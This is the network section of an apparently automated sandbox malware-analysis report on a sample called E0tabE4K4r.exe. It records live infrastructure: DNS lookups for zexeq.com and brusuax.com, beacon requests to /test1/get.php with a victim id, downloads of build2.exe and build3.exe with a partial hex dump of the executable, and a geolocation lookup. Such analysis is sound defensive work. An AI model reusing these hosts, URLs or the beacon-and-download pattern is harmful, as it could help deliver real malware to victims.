                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET53600241.1.1.1192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET53600241.1.1.1192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET53600241.1.1.1192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.774136066 CET4951853192.168.2.111.1.1.1
                                                                                                                                                  Jan 11, 2024 13:35:05.869210958 CET53495181.1.1.1192.168.2.11

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Jan 11, 2024 13:34:55.756232023 CET192.168.2.111.1.1.10x38b5Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:34:58.841063976 CET192.168.2.111.1.1.10xca0Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:34:58.845944881 CET192.168.2.111.1.1.10xa360Standard query (0)brusuax.comA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:34:59.848294020 CET192.168.2.111.1.1.10xa360Standard query (0)brusuax.comA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:34:59.848404884 CET192.168.2.111.1.1.10xca0Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:00.863744974 CET192.168.2.111.1.1.10xca0Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:00.863744974 CET192.168.2.111.1.1.10xa360Standard query (0)brusuax.comA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:05.774136066 CET192.168.2.111.1.1.10x7d1dStandard query (0)t.meA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Jan 11, 2024 13:34:55.919476032 CET1.1.1.1192.168.2.110x38b5No error (0)api.2ip.ua172.67.139.220A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:34:55.919476032 CET1.1.1.1192.168.2.110x38b5No error (0)api.2ip.ua104.21.65.24A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com169.148.114.73A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com190.187.52.42A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com181.197.76.238A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469082117 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com187.211.34.211A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com169.148.114.73A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com190.187.52.42A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com181.197.76.238A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469095945 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com187.211.34.211A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com169.148.114.73A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com190.187.52.42A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com181.197.76.238A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.469106913 CET1.1.1.1192.168.2.110xa360No error (0)brusuax.com187.211.34.211A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.479976892 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480130911 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:01.480140924 CET1.1.1.1192.168.2.110xca0No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 11, 2024 13:35:05.869210958 CET1.1.1.1192.168.2.110x7d1dNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • api.2ip.ua
                                                                                                                                                  • t.me
                                                                                                                                                  • zexeq.com
                                                                                                                                                  • brusuax.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.1149709109.175.29.39806744C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:01.695245028 CET137OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.1149710109.175.29.39807304C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:01.710262060 CET126OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.1149708211.40.39.251806744C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:01.763361931 CET91OUTGET /dl/build2.exe HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: brusuax.com
                                                                                                                                                  Jan 11, 2024 13:35:03.128504038 CET1286INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                  Date: Thu, 11 Jan 2024 12:35:02 GMT
                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                  Content-Length: 367104
                                                                                                                                                  Last-Modified: Wed, 10 Jan 2024 12:50:02 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "659e927a-59a00"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 e6 e8 d7 24 87 86 84 24 87 86 84 24 87 86 84 3a d5 13 84 35 87 86 84 3a d5 05 84 76 87 86 84 3a d5 02 84 00 87 86 84 03 41 fd 84 27 87 86 84 24 87 87 84 78 87 86 84 3a d5 0c 84 25 87 86 84 3a d5 12 84 25 87 86 84 3a d5 17 84 25 87 86 84 52 69 63 68 24 87 86 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 02 ae 12 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0e 04 00 00 b4 01 00 00 00 00 00 94 22 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 57 7d 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 55 04 00 28 00 00 00 00 10 05 00 ca c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 48 04 00 18 00 00 00 58 48 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 79 0d 04 00 00 10 00 00 00 0e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 3d 00 00 00 20 04 00 00 3e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 97 00 00 00 60 04 00 00 86 00 00 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 a1 01 00 00 00 00 05 00 00 02 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ca c1 00 00 00 10 05 00 00 c2 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`$$$:5:v:A'$x:%:%:%Rich$PELd" @W}\U(HXH@ t.texty `.rdata= >@@.data|`P@.tls@.rsrc@@
                                                                                                                                                  Jan 11, 2024 13:35:03.128541946 CET1286INData Raw: 56 8d 44 24 08 50 8b f1 e8 b8 0a 00 00 c7 06 b4 21 44 00 8b c6 5e c2 04 00 c7 01 b4 21 44 00 e9 c9 0b 00 00 56 8b f1 c7 06 b4 21 44 00 e8 bb 0b 00 00 f6 44 24 08 01 74 07 56 e8 84 0e 00 00 59 8b c6 5e c2 04 00 8b 44 24 08 8a 00 8b 4c 24 04 88 01
                                                                                                                                                  Data Ascii: VD$P!D^!DV!DD$tVY^D$L$D$P@u+UuuuuVE]Uuuuu[E]j'DueuN!DVjjN!D^y
                                                                                                                                                  Jan 11, 2024 13:35:03.423928022 CET1286INData Raw: c3 ff 74 24 04 e8 6e 02 00 00 59 c2 04 00 6a 44 b8 ce 1c 44 00 e8 5c 12 00 00 68 40 48 44 00 8d 4d d8 e8 6d fc ff ff 83 65 fc 00 8d 45 d8 50 8d 4d b0 e8 62 fb ff ff 68 30 54 44 00 8d 45 b0 50 c7 45 b0 d8 21 44 00 e8 d9 0d 00 00 cc 6a 04 e8 e8 0a
                                                                                                                                                  Data Ascii: t$nYjDD\h@HDMmeEPMbh0TDEPE!DjYt03t$MYjYVt$!D^jXjD}uvu%3j[OMmU;sjX+;w4eFjPYY
                                                                                                                                                  Jan 11, 2024 13:35:03.423995972 CET1286INData Raw: 89 30 57 57 57 57 57 e8 53 14 00 00 83 c4 14 8b c6 eb 29 39 7d 10 74 e0 39 45 0c 73 0e e8 c0 14 00 00 6a 22 59 89 08 8b f1 eb d7 50 ff 75 10 ff 75 08 e8 4d 0f 00 00 83 c4 0c 33 c0 5f 5e 5d c3 8b ff 55 8b ec 8b 45 08 56 33 f6 3b c6 75 1c e8 8e 14
                                                                                                                                                  Data Ascii: 0WWWWWS)9}t9Esj"YPuuM3_^]UEV3;uVVVVV3@^]UEV3;uZVVVVV3@ ^]``0"DUS]VW0"Dt&PFVYYGt3VP
                                                                                                                                                  Jan 11, 2024 13:35:03.424038887 CET1286INData Raw: 08 e8 38 23 00 00 83 c4 0c eb c1 ff 75 0c 57 ff 75 08 e8 a7 22 00 00 83 c4 0c 39 7d 10 74 b6 39 75 0c 73 0e e8 b3 0f 00 00 6a 22 59 89 08 8b f1 eb ad 6a 16 58 5f 5e 5d c3 8b ff 55 8b ec ff 75 08 51 e8 80 26 00 00 59 59 5d c2 04 00 8b ff 51 c7 01
                                                                                                                                                  Data Ascii: 8#uWu"9}t9usj"YjX_^]UuQ&YY]Qt"Da'YUVEtV;Y^]UuQ'YY]Q"'YUEQP)YY@]UEQP(YY]UEQP(Y
                                                                                                                                                  Jan 11, 2024 13:35:03.424086094 CET1286INData Raw: fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 92 42 00 00 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 8b 45 08 ff 70 1c ff 70 28 6a 00 ff 70 18 e8 61 32 00 00 83 c4 10 5d c2 04 00 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 73
                                                                                                                                                  Data Ascii: uuuuB E_^[E]UEpp(jpa2]UVuN3sjVvvjuvu6B ^]U8S}#u7%@M3@eEc%@`DM3EEEEEEEE EeeeemdEEdE
                                                                                                                                                  Jan 11, 2024 13:35:03.715915918 CET1286INData Raw: 04 00 c0 c7 05 24 e6 44 00 01 00 00 00 a1 d0 60 44 00 89 85 d8 fc ff ff a1 d4 60 44 00 89 85 dc fc ff ff ff 15 8c 20 44 00 a3 70 e6 44 00 6a 01 e8 39 3f 00 00 59 6a 00 ff 15 88 20 44 00 68 a0 22 44 00 ff 15 84 20 44 00 83 3d 70 e6 44 00 00 75 08
                                                                                                                                                  Data Ascii: $D`D`D DpDj9?Yj Dh"D D=pDuj?Yh DP| DUWVuM};v;r=@DtWV;^_u^_]D?ur*$+@r$*@$+
                                                                                                                                                  Jan 11, 2024 13:35:03.715981960 CET1286INData Raw: 5b e8 b6 eb ff ff c9 c3 8b ff 55 8b ec 56 ff 35 44 e9 44 00 e8 d6 05 00 00 ff 75 08 8b f0 e8 51 05 00 00 59 59 a3 44 e9 44 00 8b c6 5e 5d c3 ff 35 44 e9 44 00 e8 b5 05 00 00 59 c3 8b ff 55 8b ec 5d e9 99 fe ff ff 8b ff 55 8b ec ff 35 44 e9 44 00
                                                                                                                                                  Data Ascii: [UV5DDuQYYDD^]5DDYU]U5DDYt]j:Y]s3PPPPPU]UE3;`DtA-rHwjX]`D]DjY;#]0uHbDuLbDU
                                                                                                                                                  Jan 11, 2024 13:35:03.716182947 CET1286INData Raw: 39 3d 24 f0 44 00 74 33 56 e8 8b 16 00 00 59 85 c0 0f 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 fc 37 00 00 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3 e8 74 0c 00
                                                                                                                                                  Data Ascii: 9=$Dt3VYrE;PE3uj7Y;uE;ttUu Du]e]UV5TbD5 Dt!PbDtP5TbDt'"DV DuVYth"DP4 DtuEE^]jYUV5Tb
                                                                                                                                                  Jan 11, 2024 13:35:03.716305971 CET1286INData Raw: fb ff ff 59 ff d0 ff 75 08 e8 78 fe ff ff a1 54 62 44 00 83 f8 ff 74 09 6a 00 50 ff 15 98 20 44 00 5d c3 ff 25 a8 20 44 00 ff 25 b0 20 44 00 8b ff 56 57 be b8 22 44 00 56 ff 15 14 20 44 00 85 c0 75 07 56 e8 82 03 00 00 59 8b f8 85 ff 0f 84 5e 01
                                                                                                                                                  Data Ascii: YuxTbDtjP D]% D% DVW"DV DuVY^54 Dh#DWh"DWHDh"DWLDh"DWPD=HD5 DTDt=LDt=PDtu$ DLD DHD4@5PDTD DTbD5LDP
                                                                                                                                                  Jan 11, 2024 13:35:03.716406107 CET1286INData Raw: b4 f1 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 21 f1 ff ff 83 c4 14 6a 16 58 eb 0d a1 7c e9 44 00 3b c6 74 da 89 01 33 c0 5e 5d c3 8b ff 55 8b ec 83 3d 70 f7 44 00 00 74 19 68 70 f7 44 00 e8 d6 5c 00 00 59 85 c0 74 0a ff 75 08 ff 15 70 f7 44 00
                                                                                                                                                  Data Ascii: VVVVV!jX|D;t3^]U=pDthpD\YtupDY\h!Dh|!D)YYuBhQT@t!D$x!D=tDYthtD~\YtjjjtD3]jhNDjW.Ye3C9DDED}5h


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.1149711109.175.29.39806744C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:05.700206995 CET94OUTGET /files/1/build3.exe HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.1149714109.175.29.39806744C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:07.191318035 CET137OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.1149715109.175.29.39807304C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:07.193371058 CET126OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.1149722109.175.29.39807304C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:12.672087908 CET126OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.1149721109.175.29.39806744C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:12.678596020 CET137OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.1149735109.175.29.39807304C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:18.168469906 CET126OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.1149734109.175.29.39806744C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 11, 2024 13:35:18.177783012 CET137OUTGET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: zexeq.com


                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.1149705172.67.139.220443412C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-01-11 12:34:56 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                                  Host: api.2ip.ua
